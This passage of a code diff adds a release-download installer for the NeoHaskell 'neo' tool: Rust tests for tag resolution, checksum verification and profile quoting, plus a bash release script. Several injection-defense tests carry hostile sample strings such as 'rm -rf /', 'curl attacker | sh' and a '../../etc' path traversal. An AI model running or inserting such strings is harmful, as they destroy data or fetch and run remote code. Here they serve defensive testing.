+          {"tag_name": "neo-v1.2.3"},
+          {"tag_name": "neo-v1.0.0"}
+        ]"#;
+        assert_eq!(
+            parse_tag_names(json).unwrap(),
+            vec!["core-v9.9.9", "neo-v1.2.3", "neo-v1.0.0"]
+        );
+    }
+
+    #[test]
+    fn parse_tag_names_rejects_malformed_json() {
+        // A truncated / non-array body must be a hard error, never an empty scan.
+        assert!(parse_tag_names("not json at all").is_err());
+        assert!(parse_tag_names(r#"{"tag_name":"neo-v1"}"#).is_err()); // object, not array
+        assert!(parse_tag_names(r#"[{"tag_name": "neo-v1.0.0""#).is_err()); // truncated
+    }
+
+    #[test]
+    fn parse_tag_names_tolerates_missing_and_extra_fields() {
+        // Real GitHub payloads carry many fields and some entries (drafts) can
+        // lack a tag_name; serde ignores extras and skips the null tag.
+        let json = r#"[
+          {"tag_name": "neo-v1.0.0", "name": "n", "id": 5, "assets": []},
+          {"name": "draft with no tag", "id": 6}
+        ]"#;
+        assert_eq!(parse_tag_names(json).unwrap(), vec!["neo-v1.0.0"]);
+    }
+
+    #[test]
+    fn newest_neo_tag_ignores_newer_non_neo_release() {
+        let json = r#"[
+          {"tag_name": "core-v9.9.9"},
+          {"tag_name": "neo-v1.2.3"},
+          {"tag_name": "neo-v1.0.0"}
+        ]"#;
+        assert_eq!(newest_neo_tag(json).unwrap().as_deref(), Some("neo-v1.2.3"));
+    }
+
+    #[test]
+    fn newest_neo_tag_skips_a_malformed_neo_tag() {
+        // A tag that LOOKS like neo-v but is malformed (path traversal) must be
+        // rejected by validation and skipped, so the newest VALID neo tag wins.
+        let json = r#"[
+          {"tag_name": "neo-v9.9.9/../../etc"},
+          {"tag_name": "neo-v1.2.3"}
+        ]"#;
+        assert_eq!(newest_neo_tag(json).unwrap().as_deref(), Some("neo-v1.2.3"));
+    }
+
+    #[test]
+    fn newest_neo_tag_none_when_absent() {
+        assert!(newest_neo_tag(r#"[{"tag_name":"core-v1.0.0"}]"#)
+            .unwrap()
+            .is_none());
+    }
+
+    #[test]
+    fn newest_neo_tag_errors_on_malformed_json() {
+        assert!(newest_neo_tag("<html>rate limited</html>").is_err());
+    }
+
+    #[test]
+    fn resolve_errors_on_malformed_json_page() {
+        let err = resolve_neo_tag(None, |_| Ok("nonsense".to_string())).unwrap_err();
+        assert!(err.to_string().contains("JSON"));
+    }
+
+    #[test]
+    fn resolve_skips_malformed_tag_and_picks_valid_one() {
+        let page = r#"[{"tag_name":"neo-v2.0.0;rm -rf"},{"tag_name":"neo-v1.9.0"}]"#;
+        let tag = resolve_neo_tag(None, |p| {
+            Ok(if p == 1 {
+                page.to_string()
+            } else {
+                "[]".to_string()
+            })
+        })
+        .unwrap();
+        assert_eq!(tag, "neo-v1.9.0");
+    }
+
+    #[test]
+    fn resolve_pinned_wins_without_network() {
+        let tag = resolve_neo_tag(Some("neo-v0.4.2"), |_| {
+            panic!("must not fetch when a pin is provided")
+        })
+        .unwrap();
+        assert_eq!(tag, "neo-v0.4.2");
+    }
+
+    #[test]
+    fn resolve_pages_until_neo_release_found() {
+        let page1 = r#"[{"tag_name":"core-v9.9.9"},{"tag_name":"core-v9.9.8"}]"#;
+        let page2 = r#"[{"tag_name":"neo-v3.1.0"},{"tag_name":"neo-v3.0.0"}]"#;
+        let calls = RefCell::new(Vec::new());
+        let tag = resolve_neo_tag(None, |page| {
+            calls.borrow_mut().push(page);
+            Ok(match page {
+                1 => page1.to_string(),
+                2 => page2.to_string(),
+                _ => "[]".to_string(),
+            })
+        })
+        .unwrap();
+        assert_eq!(tag, "neo-v3.1.0");
+        assert_eq!(*calls.borrow(), vec![1, 2]);
+    }
+
+    #[test]
+    fn resolve_stops_at_empty_page_and_fails_loudly() {
+        let err = resolve_neo_tag(None, |page| {
+            Ok(if page == 1 {
+                r#"[{"tag_name":"core-v1.0.0"}]"#.to_string()
+            } else {
+                "[]".to_string()
+            })
+        })
+        .unwrap_err();
+        assert!(err.to_string().contains(NEO_TAG_PREFIX));
+    }
+
+    #[test]
+    fn resolve_propagates_fetch_failure() {
+        let err = resolve_neo_tag(None, |_| {
+            Err(InstallerError::NeoDownloadFailed {
+                url: "u".into(),
+                details: "boom".into(),
+            }
+            .into())
+        })
+        .unwrap_err();
+        assert!(err.to_string().contains("boom"));
+    }
+
+    #[test]
+    fn expected_checksum_parses_sha256sum_format() {
+        let sums = "\
+deadbeef  neo-x86_64-unknown-linux-gnu
+cafef00d *neo-aarch64-apple-darwin
+";
+        assert_eq!(
+            expected_checksum(sums, "neo-x86_64-unknown-linux-gnu").as_deref(),
+            Some("deadbeef")
+        );
+        // leading '*' binary marker tolerated
+        assert_eq!(
+            expected_checksum(sums, "neo-aarch64-apple-darwin").as_deref(),
+            Some("cafef00d")
+        );
+        assert!(expected_checksum(sums, "neo-not-listed").is_none());
+    }
+
+    #[test]
+    fn sha256_hex_is_known_answer() {
+        // echo -n "" | sha256sum
+        assert_eq!(
+            sha256_hex(b""),
+            "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
+        );
+    }
+
+    #[test]
+    fn verify_accepts_matching_and_rejects_mismatch() {
+        let bytes = b"neo binary contents";
+        let good = sha256_hex(bytes);
+        assert!(verify_sha256(bytes, "neo-x", &good).is_ok());
+        // case-insensitive
+        assert!(verify_sha256(bytes, "neo-x", &good.to_uppercase()).is_ok());
+        let err = verify_sha256(bytes, "neo-x", "0000").unwrap_err();
+        let msg = err.to_string();
+        assert!(msg.contains("neo-x"));
+        assert!(msg.contains("0000"));
+    }
+
+    #[test]
+    fn atomic_install_writes_executable_and_replaces() {
+        let dir = tempfile::tempdir().unwrap();
+        let dest = dir.path().join("neo");
+        atomic_install(b"#!/bin/sh\necho v1\n", &dest).unwrap();
+        assert_eq!(std::fs::read(&dest).unwrap(), b"#!/bin/sh\necho v1\n");
+        #[cfg(unix)]
+        {
+            use std::os::unix::fs::PermissionsExt;
+            let mode = std::fs::metadata(&dest).unwrap().permissions().mode();
+            assert_eq!(mode & 0o111, 0o111, "installed binary must be executable");
+        }
+        // Atomic replacement over an existing file.
+        atomic_install(b"#!/bin/sh\necho v2\n", &dest).unwrap();
+        assert_eq!(std::fs::read(&dest).unwrap(), b"#!/bin/sh\necho v2\n");
+    }
+
+    #[test]
+    fn atomic_install_creates_missing_bin_dir() {
+        let dir = tempfile::tempdir().unwrap();
+        let dest = dir.path().join("nested").join("bin").join("neo");
+        atomic_install(b"x", &dest).unwrap();
+        assert!(dest.exists());
+    }
+
+    #[test]
+    fn dry_run_plan_names_asset_and_dest_without_side_effects() {
+        let plan = dry_run_plan(
+            "x86_64-unknown-linux-gnu",
+            Some("neo-v0.1.0"),
+            Path::new("/home/u/.local/bin/neo"),
+        );
+        assert!(plan.contains("neo-x86_64-unknown-linux-gnu"));
+        assert!(plan.contains("neo-v0.1.0"));
+        assert!(plan.contains("/home/u/.local/bin/neo"));
+        assert!(plan.contains(SHA256SUMS));
+        let plan_latest = dry_run_plan("aarch64-apple-darwin", None, Path::new("/x/neo"));
+        assert!(plan_latest.contains("newest"));
+    }
+
+    /// In-memory fetcher: routes URLs to fixtures, records the URLs hit.
+    struct FakeFetcher {
+        releases: String,
+        sums: String,
+        asset: Vec<u8>,
+        hits: RefCell<Vec<String>>,
+    }
+    impl Fetcher for FakeFetcher {
+        fn text(&self, url: &str) -> Result<String> {
+            self.hits.borrow_mut().push(url.to_string());
+            if url.contains("api.github.com") {
+                if url.ends_with("page=1") {
+                    Ok(self.releases.clone())
+                } else {
+                    Ok("[]".to_string())
+                }
+            } else if url.ends_with(SHA256SUMS) {
+                Ok(self.sums.clone())
+            } else {
+                panic!("unexpected text url: {url}")
+            }
+        }
+        fn bytes(&self, url: &str) -> Result<Vec<u8>> {
+            self.hits.borrow_mut().push(url.to_string());
+            Ok(self.asset.clone())
+        }
+    }
+
+    #[test]
+    fn end_to_end_download_verify_install_happy_path() {
+        let target = "x86_64-unknown-linux-gnu";
+        let asset = neo_asset_name(target);
+        let bytes = b"the neo binary".to_vec();
+        let hex = sha256_hex(&bytes);
+        let fake = FakeFetcher {
+            releases: r#"[{"tag_name":"neo-v2.0.0"}]"#.to_string(),
+            sums: format!("{hex}  {asset}\n"),
+            asset: bytes.clone(),
+            hits: RefCell::new(Vec::new()),
+        };
+        let dir = tempfile::tempdir().unwrap();
+        let dest = dir.path().join("neo");
+        let tag = download_verify_install(&fake, target, None, &dest).unwrap();
+        assert_eq!(tag, "neo-v2.0.0");
+        assert_eq!(std::fs::read(&dest).unwrap(), bytes);
+        // Never used the repo-wide releases/latest redirect.
+        assert!(fake
+            .hits
+            .borrow()
+            .iter()
+            .all(|u| !u.contains("releases/latest")));
+    }
+
+    #[test]
+    fn end_to_end_rejects_tampered_asset_before_install() {
+        let target = "aarch64-apple-darwin";
+        let asset = neo_asset_name(target);
+        let fake = FakeFetcher {
+            releases: r#"[{"tag_name":"neo-v2.0.0"}]"#.to_string(),
+            // checksum for different content than the asset actually served
+            sums: format!("{}  {asset}\n", sha256_hex(b"expected contents")),
+            asset: b"TAMPERED contents".to_vec(),
+            hits: RefCell::new(Vec::new()),
+        };
+        let dir = tempfile::tempdir().unwrap();
+        let dest = dir.path().join("neo");
+        let err = download_verify_install(&fake, target, None, &dest).unwrap_err();
+        assert!(err.to_string().to_lowercase().contains("checksum"));
+        assert!(!dest.exists(), "a tampered asset must NEVER be installed");
+    }
+
+    #[test]
+    fn end_to_end_fails_when_asset_absent_from_manifest() {
+        let target = "x86_64-apple-darwin";
+        let fake = FakeFetcher {
+            releases: r#"[{"tag_name":"neo-v2.0.0"}]"#.to_string(),
+            sums: "abc  neo-some-other-target\n".to_string(),
+            asset: b"x".to_vec(),
+            hits: RefCell::new(Vec::new()),
+        };
+        let dir = tempfile::tempdir().unwrap();
+        let dest = dir.path().join("neo");
+        let err = download_verify_install(&fake, target, None, &dest).unwrap_err();
+        assert!(err.to_string().contains(&neo_asset_name(target)));
+        assert!(!dest.exists());
+    }
+
+    #[test]
+    fn download_urls_are_tag_scoped_not_latest() {
+        assert_eq!(
+            asset_download_url("neo-v1.0.0", "neo-x86_64-unknown-linux-gnu"),
+            "https://github.com/neohaskell/NeoHaskell/releases/download/neo-v1.0.0/neo-x86_64-unknown-linux-gnu"
+        );
+        assert!(!releases_page_url(1).contains("releases/latest"));
+        assert!(releases_page_url(2).ends_with("page=2"));
+    }
+
+    #[test]
+    fn install_neo_dry_run_touches_nothing() {
+        assert!(install_neo(false, true).is_ok());
+        assert!(install_neo(true, true).is_ok());
+    }
+
+    // ── NEO_BIN_DIR validation + shell-quoting (profile-injection defense) ──── //
+
+    #[test]
+    fn validate_bin_dir_accepts_absolute_paths() {
+        assert_eq!(
+            validate_bin_dir("/home/u/.local/bin").unwrap(),
+            PathBuf::from("/home/u/.local/bin")
+        );
+        // A space is a legitimate path character (we quote on emission, not reject).
+        assert!(validate_bin_dir("/opt/neo bin").is_ok());
+    }
+
+    #[test]
+    fn validate_bin_dir_rejects_relative_empty_and_control_chars() {
+        assert!(validate_bin_dir("").is_err());
+        assert!(validate_bin_dir("relative/bin").is_err());
+        assert!(validate_bin_dir("~/bin").is_err());
+        // Newline / CR / NUL / tab would corrupt or inject into the profile.
+        assert!(validate_bin_dir("/tmp/evil\nmalicious").is_err());
+        assert!(validate_bin_dir("/tmp/evil\r\ncurl attacker").is_err());
+        assert!(validate_bin_dir("/tmp/evil\0x").is_err());
+        assert!(validate_bin_dir("/tmp/evil\tx").is_err());
+    }
+
+    #[test]
+    fn posix_single_quote_is_injection_proof() {
+        assert_eq!(posix_single_quote("/plain/path"), "'/plain/path'");
+        // Embedded single quote is closed, escaped, reopened.
+        assert_eq!(posix_single_quote("/a'b"), "'/a'\\''b'");
+        // Metacharacters are inert inside single quotes.
+        assert_eq!(
+            posix_single_quote("/tmp/x\"; rm -rf /; #"),
+            "'/tmp/x\"; rm -rf /; #'"
+        );
+    }
+
+    #[test]
+    fn fish_single_quote_escapes_backslash_and_quote() {
+        assert_eq!(fish_single_quote("/plain"), "'/plain'");
+        assert_eq!(fish_single_quote("/a'b"), "'/a\\'b'");
+        assert_eq!(fish_single_quote("/a\\b"), "'/a\\\\b'");
+    }
+
+    #[test]
+    fn path_line_default_uses_expandable_home() {
+        let bash = path_line_for(&detect::Shell::Bash, None);
+        assert!(bash.starts_with("export PATH="));
+        assert!(bash.contains("$HOME/.local/bin"));
+        let fish = path_line_for(&detect::Shell::Fish, None);
+        assert!(fish.starts_with("fish_add_path"));
+        assert!(fish.contains("$HOME/.local/bin"));
+    }
+
+    #[test]
+    fn path_line_override_is_single_quoted_and_injection_proof_bash() {
+        // A validated-but-hostile-looking absolute path must be emitted so that no
+        // metacharacter can escape into the user's shell profile.
+        let evil = Path::new("/tmp/evil\"; curl attacker | sh; #");
+        let line = path_line_for(&detect::Shell::Zsh, Some(evil));
+        assert!(line.starts_with("export PATH='/tmp/evil\"; curl attacker | sh; #'"));
+        // The dangerous chars live INSIDE the single-quoted segment; the double
+        // quote that would end the string only appears within '...'.
+        assert!(line.contains("'/tmp/evil\"; curl attacker | sh; #'"));
+        // $HOME / $PATH still expand (they are in the separate double-quoted part).
+        assert!(line.contains("$HOME/.nix-profile/bin"));
+        assert!(line.ends_with(":$PATH\""));
+    }
+
+    #[test]
+    fn path_line_override_is_single_quoted_fish() {
+        let evil = Path::new("/opt/ne'o");
+        let line = path_line_for(&detect::Shell::Fish, Some(evil));
+        assert!(line.starts_with("fish_add_path '/opt/ne\\'o' "));
+    }
+
+    #[test]
+    fn path_line_override_with_space_is_one_word() {
+        let line = path_line_for(&detect::Shell::Bash, Some(Path::new("/opt/neo bin")));
+        assert!(line.contains("'/opt/neo bin'"));
+    }
+}

--- a/installer/src/verify.rs
+++ b/installer/src/verify.rs
@@ -1,7 +1,23 @@
 use anyhow::Result;
 use std::process::Command;
 
-use crate::{detect, error::InstallerError, ui};
+use crate::{detect, error::InstallerError, release, ui};
+
+/// The command used to invoke the just-installed `neo`. Prefer the exact path we
+/// installed it to (it is not yet on the current process's PATH — the user's
+/// next shell picks it up via the profile edit), falling back to `neo` on PATH.
+fn neo_invocation() -> String {
+    match release::default_bin_dir() {
+        Ok(dir) => {
+            let bin = dir.join("neo");
+            if bin.exists() {
+                return bin.to_string_lossy().into_owned();
+            }
+            "neo".to_string()
+        }
+        Err(_) => "neo".to_string(),
+    }
+}
 
 pub fn verify_nix(dry_run: bool) -> Result<()> {
     if dry_run {
@@ -32,7 +48,7 @@ pub fn verify_neo(dry_run: bool) -> Result<()> {
         return Ok(());
     }
 
-    let output = Command::new("neo")
+    let output = Command::new(neo_invocation())
         .arg("--version")
         .output()
         .map_err(InstallerError::CommandFailed)?;

--- a/installer/tests/consistency.rs
+++ b/installer/tests/consistency.rs
@@ -6,7 +6,15 @@
 //! A mismatch means a real bootstrap 404s against real releases, which no
 //! amount of unit testing of the binary would catch. These tests read the two
 //! sources of truth off disk and assert they agree.
+//!
+//! A second group ties the NATIVE `neo` release contract together: the
+//! installer's own download logic (`neo_install::release`), the release workflow
+//! (`.github/workflows/neo-release.yml`), and the shared naming/checksum script
+//! (`scripts/neo-release`) must agree on the asset names, the supported targets,
+//! the publishing repository, and the `neo-v*` tag prefix — and the installer
+//! must NOT install `neo` by evaluating/compiling the `neo#neo-cli` flake.
 
+use neo_install::release;
 use std::fs;
 use std::io::Write;
 use std::path::PathBuf;
@@ -319,4 +327,160 @@ fn bootstrap_latest_propagates_release_api_failure() {
         !out.status.success(),
         "release API/network failure must propagate as non-zero, not masquerade as an empty release stream"
     );
+}
+
+// ── Native `neo` release contract: installer ↔ neo-release.yml ↔ neo-release ──
+
+/// The repo root (`installer/`'s parent).
+fn repo_root() -> PathBuf {
+    crate_dir()
+        .parent()
+        .expect("installer/ has a parent")
+        .to_path_buf()
+}
+
+fn read_repo(rel: &str) -> String {
+    let p = repo_root().join(rel);
+    fs::read_to_string(&p).unwrap_or_else(|e| panic!("failed to read {}: {e}", p.display()))
+}
+
+/// Run `scripts/neo-release <args...>` and return trimmed stdout (the shared
+/// naming contract, executable). Panics on non-zero exit.
+fn neo_release(args: &[&str]) -> String {
+    let script = repo_root().join("scripts/neo-release");
+    let out = Command::new(&script)
+        .args(args)
+        .output()
+        .unwrap_or_else(|e| panic!("spawn {}: {e}", script.display()));
+    assert!(
+        out.status.success(),
+        "scripts/neo-release {args:?} failed: {}",
+        String::from_utf8_lossy(&out.stderr)
+    );
+    String::from_utf8_lossy(&out.stdout).trim().to_string()
+}
+
+#[test]
+fn installer_asset_names_match_the_shared_release_script() {
+    // The installer downloads `neo_asset_name(target)`; the workflow packages via
+    // `scripts/neo-release asset-name`. They must be byte-identical per target.
+    for target in release::NEO_TARGETS {
+        assert_eq!(
+            release::neo_asset_name(target),
+            neo_release(&["asset-name", target]),
+            "installer asset name and scripts/neo-release disagree for {target}"
+        );
+    }
+}
+
+#[test]
+fn installer_targets_match_the_shared_release_script() {
+    let mut script_targets: Vec<String> = neo_release(&["targets"])
+        .lines()
+        .map(str::to_string)
+        .collect();
+    script_targets.sort();
+    let mut installer_targets: Vec<String> =
+        release::NEO_TARGETS.iter().map(|s| s.to_string()).collect();
+    installer_targets.sort();
+    assert_eq!(
+        script_targets, installer_targets,
+        "the installer's supported targets and scripts/neo-release have drifted"
+    );
+}
+
+#[test]
+fn neo_release_workflow_builds_every_installer_target() {
+    let wf = read_repo(".github/workflows/neo-release.yml");
+    for target in release::NEO_TARGETS {
+        assert!(
+            wf.contains(target),
+            "neo-release.yml no longer builds '{target}' — a platform the installer \
+             downloads would have no published asset"
+        );
+    }
+}
+
+#[test]
+fn neo_release_workflow_uses_the_neo_v_tag_prefix() {
+    let wf = read_repo(".github/workflows/neo-release.yml");
+    assert!(
+        wf.contains(release::NEO_TAG_PREFIX),
+        "neo-release.yml must key releases off the '{}' tag prefix the installer resolves",
+        release::NEO_TAG_PREFIX
+    );
+}
+
+#[test]
+fn neo_release_workflow_routes_naming_through_the_shared_script() {
+    let wf = read_repo(".github/workflows/neo-release.yml");
+    assert!(
+        wf.contains("scripts/neo-release"),
+        "neo-release.yml must package/checksum via scripts/neo-release so its asset \
+         names cannot drift from what the installer downloads"
+    );
+}
+
+#[test]
+fn checksum_manifest_name_is_one_convention_across_both_trains() {
+    // ONE checksum-manifest filename everywhere: the installer's native-download
+    // path (release::SHA256SUMS), the shared script, and BOTH release workflows
+    // must publish/read `SHA256SUMS` — never a divergent `SHA256SUMS.txt`.
+    assert_eq!(release::SHA256SUMS, "SHA256SUMS");
+    let txt = format!("{}.txt", release::SHA256SUMS);
+    for wf in [
+        ".github/workflows/neo-release.yml",
+        ".github/workflows/installer-ci.yml",
+    ] {
+        let text = read_repo(wf);
+        assert!(
+            text.contains(release::SHA256SUMS),
+            "{wf} must publish the '{}' manifest",
+            release::SHA256SUMS
+        );
+        assert!(
+            !text.contains(&txt),
+            "{wf} still uses the divergent '{txt}' name — unify on '{}'",
+            release::SHA256SUMS
+        );
+    }
+}
+
+#[test]
+fn installer_publishes_to_the_declared_monorepo() {
+    // The installer downloads `neo` releases from NEO_REPO; that must be the same
+    // monorepo the crate declares (and therefore where the workflow publishes).
+    assert_eq!(
+        release::NEO_REPO,
+        monorepo_slug(),
+        "release::NEO_REPO must point at the monorepo the crate is published from"
+    );
+}
+
+#[test]
+fn installer_does_not_install_neo_via_the_neo_cli_flake() {
+    // The native-download installer must NEVER evaluate/compile/install neo from
+    // github:neohaskell/neo#neo-cli. The prose here names the forbidden ref, so
+    // the guard scans EXECUTABLE Rust only: the `nix profile install` arg tuple
+    // is the artifact that reappears if someone reintroduces that path.
+    for src in ["src/install.rs", "src/release.rs", "src/lib.rs"] {
+        let body = read(src);
+        let executable: String = body
+            .lines()
+            .filter(|l| {
+                let t = l.trim_start();
+                !(t.starts_with("//") || t.starts_with('*'))
+            })
+            .collect::<Vec<_>>()
+            .join("\n");
+        assert!(
+            !executable.contains("\"profile\", \"install\""),
+            "{src} constructs a `nix profile install` command — the installer must \
+             download a native neo release, not install the neo#neo-cli flake"
+        );
+        assert!(
+            !executable.contains("neo#neo-cli"),
+            "{src} references the neo#neo-cli flake in executable code — forbidden"
+        );
+    }
 }

--- a/scripts/doctor
+++ b/scripts/doctor
@@ -91,6 +91,7 @@ scripts/changelog --self-test || fail=1
 scripts/revert --self-test || fail=1
 scripts/retrospect --self-test || fail=1
 scripts/workflow-check --self-test || fail=1
+scripts/neo-release --self-test >/dev/null || fail=1
 # Quiet on success, but surface the captured output on failure.
 if ! crg_out=$(scripts/codemap-regen-guard.py --self-test 2>&1); then
   printf '%s\n' "${crg_out}"

--- a/scripts/neo-release
+++ b/scripts/neo-release
@@ -1,0 +1,310 @@
+#!/usr/bin/env bash
+#
+# neo-release — the single source of truth for how a native `neo` release asset
+# is NAMED, PACKAGED, CHECKSUMMED, VERIFIED, and INSTALLED for a rehearsal.
+#
+# Both the release workflow (.github/workflows/neo-release.yml) and the CI
+# release rehearsal call THIS script, so the asset-naming contract and the
+# checksum manifest can never drift between "how the release is published" and
+# "how the rehearsal consumes it". The installer's own native-download path
+# (installer/src/release.rs) shares the same contract; the installer consistency
+# tests and workflow-check freeze all three together.
+#
+# Naming contract (shared with installer/src/release.rs::neo_asset_name):
+#   asset  = neo-<target>
+#   digest = SHA256SUMS  (sha256sum format: "<hex>␠␠neo-<target>")
+#
+# Supported targets (shared with release_target / NEO_TARGETS):
+#   x86_64-unknown-linux-gnu  aarch64-unknown-linux-gnu
+#   x86_64-apple-darwin       aarch64-apple-darwin
+#
+# Subcommands:
+#   targets                         print the supported target triples (one/line)
+#   asset-name <target>             print the release-asset name for <target>
+#   package <target> <bin> <out>    copy a built binary to <out>/neo-<target>
+#   checksums <dir>                 write <dir>/SHA256SUMS over the neo-* assets
+#   verify <dir> <target>           verify neo-<target> against <dir>/SHA256SUMS
+#   install <dir> <target> <dest>   copy-once, verify that copy, atomically place
+#   inspect <binary> <target>       portability gate: fail on /nix/store refs
+#   --self-test                     exercise naming + checksum round-trip (no net)
+#
+# Publication is NEVER performed here — that is the workflow's tag-gated job.
+set -euo pipefail
+
+SHA256SUMS="SHA256SUMS"
+TARGETS=(
+  "x86_64-unknown-linux-gnu"
+  "aarch64-unknown-linux-gnu"
+  "x86_64-apple-darwin"
+  "aarch64-apple-darwin"
+)
+
+die() { printf 'neo-release: %s\n' "$*" >&2; exit 1; }
+
+asset_name() { printf 'neo-%s\n' "$1"; }
+
+is_supported_target() {
+  local t
+  for t in "${TARGETS[@]}"; do [ "$t" = "$1" ] && return 0; done
+  return 1
+}
+
+# sha256 of a file as lowercase hex, portably (Linux sha256sum / macOS shasum).
+sha256_of() {
+  if command -v sha256sum >/dev/null 2>&1; then
+    sha256sum "$1" | awk '{print $1}'
+  else
+    shasum -a 256 "$1" | awk '{print $1}'
+  fi
+}
+
+# Write "<hex>␠␠<name>" for one file, matching coreutils sha256sum output so the
+# installer's SHA256SUMS parser (installer/src/release.rs) reads it identically.
+sha256_line() {
+  local file="$1" name="$2"
+  printf '%s  %s\n' "$(sha256_of "$file")" "$name"
+}
+
+cmd_targets() { printf '%s\n' "${TARGETS[@]}"; }
+
+cmd_asset_name() {
+  [ $# -eq 1 ] || die "usage: neo-release asset-name <target>"
+  is_supported_target "$1" || die "unsupported target: $1"
+  asset_name "$1"
+}
+
+cmd_package() {
+  [ $# -eq 3 ] || die "usage: neo-release package <target> <binary> <outdir>"
+  local target="$1" bin="$2" out="$3"
+  is_supported_target "$target" || die "unsupported target: $target"
+  [ -f "$bin" ] || die "built binary not found: $bin"
+  mkdir -p "$out"
+  local dest="$out/$(asset_name "$target")"
+  cp "$bin" "$dest"
+  chmod +x "$dest"
+  printf 'packaged %s\n' "$dest"
+}
+
+cmd_checksums() {
+  [ $# -eq 1 ] || die "usage: neo-release checksums <dir>"
+  local dir="$1"
+  [ -d "$dir" ] || die "not a directory: $dir"
+  # Enumerate the neo-* assets without a subshell cd (keeps paths explicit).
+  local found=0 out="$dir/$SHA256SUMS"
+  : > "$out"
+  local f name
+  for f in "$dir"/neo-*; do
+    [ -e "$f" ] || continue
+    name="$(basename "$f")"
+    [ "$name" = "$SHA256SUMS" ] && continue
+    sha256_line "$f" "$name" >> "$out"
+    found=$((found + 1))
+  done
+  [ "$found" -gt 0 ] || die "no neo-* assets found in $dir to checksum"
+  printf 'wrote %s (%d asset(s))\n' "$out" "$found"
+}
+
+# Verify one asset against the manifest WITHOUT trusting the shell to expand the
+# expected hash into a command: read the expected hex, recompute, compare.
+cmd_verify() {
+  [ $# -eq 2 ] || die "usage: neo-release verify <dir> <target>"
+  local dir="$1" target="$2"
+  is_supported_target "$target" || die "unsupported target: $target"
+  local name; name="$(asset_name "$target")"
+  local asset="$dir/$name" manifest="$dir/$SHA256SUMS"
+  [ -f "$asset" ] || die "asset not found: $asset"
+  [ -f "$manifest" ] || die "manifest not found: $manifest"
+  local expected
+  expected="$(awk -v n="$name" '($2 == n) || ($2 == "*" n) {print $1; exit}' "$manifest")"
+  [ -n "$expected" ] || die "no $SHA256SUMS entry for $name (cannot verify integrity)"
+  local actual; actual="$(sha256_of "$asset")"
+  if [ "$expected" != "$actual" ]; then
+    die "checksum mismatch for $name: expected $expected got $actual (asset NOT trusted)"
+  fi
+  printf 'verified %s (%s)\n' "$name" "$actual"
+}
+
+# The expected hex for <name> from <manifest>, or empty. `awk` compares fields
+# as data (never expands the hash into a command).
+manifest_expected() {
+  local manifest="$1" name="$2"
+  awk -v n="$name" '($2 == n) || ($2 == "*" n) {print $1; exit}' "$manifest"
+}
+
+# Atomically install a verified asset to <dest> with NO TOCTOU window: copy the
+# published asset ONCE into a private temp file in the destination directory,
+# hash THAT EXACT temp file, compare to the manifest, and only then rename the
+# very same file into place. Nothing re-reads the source between verify and
+# install, so a source swapped after verification can never be the thing that
+# lands (mirrors installer/src/release.rs, which verifies the exact bytes it
+# installs).
+cmd_install() {
+  [ $# -eq 3 ] || die "usage: neo-release install <dir> <target> <dest>"
+  local dir="$1" target="$2" dest="$3"
+  is_supported_target "$target" || die "unsupported target: $target"
+  local name; name="$(asset_name "$target")"
+  local asset="$dir/$name" manifest="$dir/$SHA256SUMS"
+  [ -f "$asset" ] || die "asset not found: $asset"
+  [ -f "$manifest" ] || die "manifest not found: $manifest"
+  local expected; expected="$(manifest_expected "$manifest" "$name")"
+  [ -n "$expected" ] || die "no $SHA256SUMS entry for $name (cannot verify integrity)"
+
+  local destdir; destdir="$(dirname "$dest")"
+  mkdir -p "$destdir"
+  local tmp; tmp="$(mktemp "$destdir/.neo-install.XXXXXX")"
+  cp "$asset" "$tmp"
+  local actual; actual="$(sha256_of "$tmp")"
+  if [ "$expected" != "$actual" ]; then
+    # A rejected download must never linger half-installed.
+    rm -f "$tmp"
+    die "checksum mismatch for $name: expected $expected got $actual (asset NOT installed)"
+  fi
+  chmod +x "$tmp"
+  mv -f "$tmp" "$dest"
+  printf 'installed %s -> %s (%s)\n' "$name" "$dest" "$actual"
+}
+
+# Portability gate: fail if a built native binary references the Nix store for
+# its dynamic loader, RUNPATH/RPATH, or shared libraries. A nix-built binary
+# hard-codes /nix/store paths that do not exist on a user's machine, so it is NOT
+# a portable release artifact. Run on each target's NATIVE runner (the tools are
+# platform-specific), as a blocking release gate before packaging.
+# stdin -> the offending lines that reference the Nix store (empty if portable).
+# Factored out as the pure decision seam so --self-test can exercise it without a
+# real binary or platform toolchain.
+filter_nix_store() { grep -F "/nix/store" || true; }
+
+nix_store_refs() {
+  # Print any offending lines that mention /nix/store from the platform's binary
+  # inspector; empty output means portable.
+  local binary="$1" target="$2"
+  case "$target" in
+    *linux*)
+      # ELF interpreter + dynamic RUNPATH/RPATH + needed libs.
+      { readelf -l "$binary" 2>/dev/null | grep -i "interpreter"
+        readelf -d "$binary" 2>/dev/null | grep -iE "RUNPATH|RPATH"
+        # ldd may not resolve for a cross artifact; tolerate its absence.
+        command -v ldd >/dev/null 2>&1 && ldd "$binary" 2>/dev/null || true
+      } | filter_nix_store
+      ;;
+    *darwin*)
+      otool -L "$binary" 2>/dev/null | filter_nix_store
+      ;;
+    *)
+      die "inspect: unsupported target: $target"
+      ;;
+  esac
+}
+
+cmd_inspect() {
+  [ $# -eq 2 ] || die "usage: neo-release inspect <binary> <target>"
+  local binary="$1" target="$2"
+  is_supported_target "$target" || die "unsupported target: $target"
+  [ -f "$binary" ] || die "binary not found: $binary"
+  local offenders; offenders="$(nix_store_refs "$binary" "$target")"
+  if [ -n "$offenders" ]; then
+    printf 'neo-release: NON-PORTABLE binary — references the Nix store:\n%s\n' "$offenders" >&2
+    die "refusing to release a binary with /nix/store references (not runnable off this machine)"
+  fi
+  printf 'portable: %s (%s) has no /nix/store references\n' "$binary" "$target"
+}
+
+self_test() {
+  local fails=0 tmp installed_hash manifest_hash
+  ok()  { printf '  ok   %s\n' "$1"; }
+  bad() { printf '  FAIL %s\n' "$1" >&2; fails=$((fails + 1)); }
+
+  # 1. asset naming contract.
+  [ "$(asset_name x86_64-unknown-linux-gnu)" = "neo-x86_64-unknown-linux-gnu" ] \
+    && ok "asset-name is neo-<target>" || bad "asset-name wrong"
+
+  # 2. the four supported targets, exactly.
+  [ "$(cmd_targets | sort | tr '\n' ' ')" = \
+    "aarch64-apple-darwin aarch64-unknown-linux-gnu x86_64-apple-darwin x86_64-unknown-linux-gnu " ] \
+    && ok "targets are the four supported triples" || bad "targets drifted"
+
+  # 3. unsupported target rejected.
+  ( cmd_asset_name totally-made-up ) >/dev/null 2>&1 && bad "unsupported target accepted" \
+    || ok "unsupported target rejected"
+
+  # 4. package -> checksums -> verify round-trip, and a tamper is rejected.
+  tmp="$(mktemp -d)"
+  local t="x86_64-unknown-linux-gnu"
